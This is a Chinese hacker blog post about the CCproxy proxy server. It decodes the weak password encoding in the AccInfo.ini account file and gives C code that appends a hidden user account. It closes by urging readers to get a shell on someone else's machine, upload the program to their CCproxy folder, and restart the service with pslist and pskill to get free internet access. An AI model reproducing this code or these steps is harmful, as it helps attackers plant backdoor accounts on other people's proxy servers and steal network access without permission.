黑客：用CCproxy漏洞实现免费上网

　　最近网络太乱啦，都不不怎么说，艾!不过最近漏洞出来的也不少，就光光MS都出来一大堆，呵呵，就连一个代理的小小软件都会有漏洞，呵呵!有漏洞就好，大家可以玩玩嘛!刚刚出来了个isno大哥发现的Ccproxy漏洞，goldsun写出来的软件Ccpxdown.exe的软件，有的玩，呵呵，不过今天我要写的不是这个，是我自己发现的一些东西，其实没什么技术性!

　　大家都知道ccproxy这个小软件吧!这个软件在我们学校比较流行，用代理的，基本上都是这个，呵呵，估计大家所在的学校和小区的局域网也是一样吧!那今天就让我给大家介绍这个软件：

　　大家打开ccproxy的目录，只要大家以前配置个帐户，那么在其下面就会有个AccInfo.ini的文件，这个就是帐户配置文件，现在给大家分析一下：

　　首先让大家看看一个典型的AccInfo.ini文件，代码如下：

　　[System]

　　UserCount=3　 -----------这里是帐户的个数

　　AuthModel=1　 ----------1代表允许部分

　　AuthType=2　 ---------允许的连接模式的个数

　　TimeScheduleCount=0

　　WebFilterCount=0

　　[User001]

　　UserName=User-001

　　Password=

　　MACAddress=

　　IPAddressLow=219.216.100.1

　　IPAddressHigh=219.216.100.1

　　ServiceMask=254

　　MaxConn=-1

　　BandWidth=-1

　　WebFilter=-1

　　TimeSchedule=-1

　　EnableUserPassword=0

　　EnableIPAddress=1

　　EnableMACAddress=0

　　[User002]

　　UserName=User-001

　　Password=898884883

　　MACAddress=

　　IPAddressLow=0.0.0.0

　　IPAddressHigh=0.0.0.0

　　ServiceMask=254

　　MaxConn=-1

　　BandWidth=-1

　　WebFilter=-1

　　TimeSchedule=-1

　　EnableUserPassword=1

　　EnableIPAddress=0

　　EnableMACAddress=0

　　大家看到上面注释的部分了吗?

　　我要修改的也是这个地方!先来解释这个[AuthType=2　 ----的接模式的个数]这里假如你的CCPROXY只用一种验证模式，那么它就是1，假如你还有其他验证模式，比如用户/密码，MAC地址，...，的话那么Auth Type就会变化使等他的数字与你的验证模式种类数相同!

　　经过我做实验知道，只要我们修改：UserCount=3 AuthModel=1 AuthType=2这三个地方，还有在下面在添加一些代码，那么重起CCPROXY后，帐户就会添加成功了!但是大家要注意到这些地方，想[User-00x]的地方，有多少个用户，[User-00x]中的x就是多少，否则将会失败!还有就是假如我们添加代码成功后，必须重启动CCPROXY，我们添加的帐户才会生效!

　　好了现在我们来添加代码，我们要在CCPROXY里新增一个新的用户，那么我们就可以在后添加上如下代码：

　　[User00x]

　　UserName=User-001

　　Password=898884883

　　MACAddress=

　　IPAddressLow=0.0.0.0

　　IPAddressHigh=0.0.0.0

　　ServiceMask=254

　　MaxConn=-1

　　BandWidth=-1

　　WebFilter=-1

　　TimeSchedule=-1

　　EnableUserPassword=1

　　EnableIPAddress=0

　　EnableMACAddress=0

　　这段代码是什么意思呢?EnableUserPassword=1-----表示以用户/密码的验证模式;

　　EnableIPAddress=0----------0表示不是这种模式，也就是不是IP地址验证模式;

　　EnableMACAddress=0----------0表示不是这种模式，也就是不是MAC地址验证;当然还有很多种，我就不一一介绍了!

　　UserName=User-001----------------用户名!

　　Password=898884883----------------密码!

　　那898 884 883表示什么呢?它表示的就是est!

　　我现在列举一些例子：

　　1------950

　　2------949

　　9------942

　　a------902

　　A------934

　　a ------902

　　b ------901

　　c ------900

　　d ------899

　　z ------877

　　大家看到这些应该知道了吧!950代表1，949代表2，依次递减!

　　902代表a，901代表b，依次递减，大写的字母比小写字母大32;

　　现在你就知道898884883代表的是est了吧!呵呵，大家也可以自己配置!

　　好了说到这里，我们的发现的介绍也就基本完了!

　　那么我们如果程序来添加一个新的帐户呢?(下面是我自己写的C代码，代码都没有进行任何的优化，希望大家不要笑)

　　#include

　　main()

　　{int c=0,user,model,i;

　　FILE*fp;

　　clrscr();

　　fp=fopen("AccInfo.ini","r+");

　　while(c!=44)

　　{getc(fp);

　　c++;

　　if(c==19){ user=getc(fp);

　　printf("\nthe total user is:%c\n",user);

　　}

　　if(c==41){ model=getc(fp);

　　printf("\nthe curent model is:%c\n",model);

　　}

　　}

　　fseek(fp,20,0);

　　putc(++user,fp);

　　fseek(fp,45,0);

　　putc(++model,fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r");

　　c=0;

　　while(c!=44)

　　{putchar(getc(fp));

　　c++;

　　}

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("[User004]\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("UserName=User-001\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("Password=898884883\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("MACAddress=\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("IPAddressLow=0.0.0.0\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("IPAddressHigh=0.0.0.0\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("ServiceMask=254\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("MaxConn=-1\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("BandWidth=-1\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("WebFilter=-1\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("TimeSchedule=-1\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("EnableUserPassword=1\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("EnableIPAddress=0\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,0,2);

　　fputs("EnableMACAddress=0\n",fp);

　　fclose(fp);

　　fp=fopen("AccInfo.ini","r+");

　　fseek(fp,-237L,2);

　　putc(user,fp);

　　fclose(fp);

　　}

　　用TC或者VC都能编译出来!

　　编译出来后大家可以放到CCPROXY的目录下运行，看看是不是多了个新的帐户!验证形式：用户/密码

　　用户名：User-001

　　密码 ：est

　　其实作者本来设想的这个小东西应该具有如下功能的：

　　搜索系统进程中是否有CCPRXOY，如果没有提示错误!

　　并搜索CCPROXY所在的目录，

　　杀死Ccproxy

　　添加帐户;

　　在重起CCproxy

　　但是现在作者只写出了添加帐户的代码，其他的没时间去写了!大家可以自己发挥!剩余的代码，实现免费上网已经不是什么难题了!

　　其实，大家想玩的话，不用我告诉你方法你都知道，只要大家拿到对方的一个shell上传到对方的 CCPOXY目录运行，结和pslist.exe和pskill.exe，也能先来玩玩!